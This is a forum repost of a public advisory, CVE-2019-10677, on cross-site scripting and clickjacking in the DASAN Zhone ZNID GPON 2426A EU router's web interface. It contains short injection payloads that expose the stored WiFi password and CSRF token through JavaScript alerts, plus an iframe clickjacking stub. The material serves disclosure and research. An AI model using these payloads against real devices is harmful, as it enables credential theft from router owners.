Jump to content

DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting


This CHT

Recommended Posts

Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters.

# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU

# Date: 31.03.2019

# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl

# Vendor Homepage: https://dasanzhone.com

# Version: <= S3.1.285

# Alternate Version: <= S3.0.738

# Tested on: version S3.1.285 (alternate version S3.0.738)

# CVE : CVE-2019-10677

= Reflected Cross-Site Scripting (XSS) =

= Stored Cross-Site Scripting (XSS) =

* WiFi network plaintext password;alert(wpaPskKey);//';alert(wpaPskKey);//

* CSRF token';alert(sessionKey);//

= Clickjacking =

<html><body><iframe src=""></iframe></body></html>
Link to post
Link to comment
Share on other sites


  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...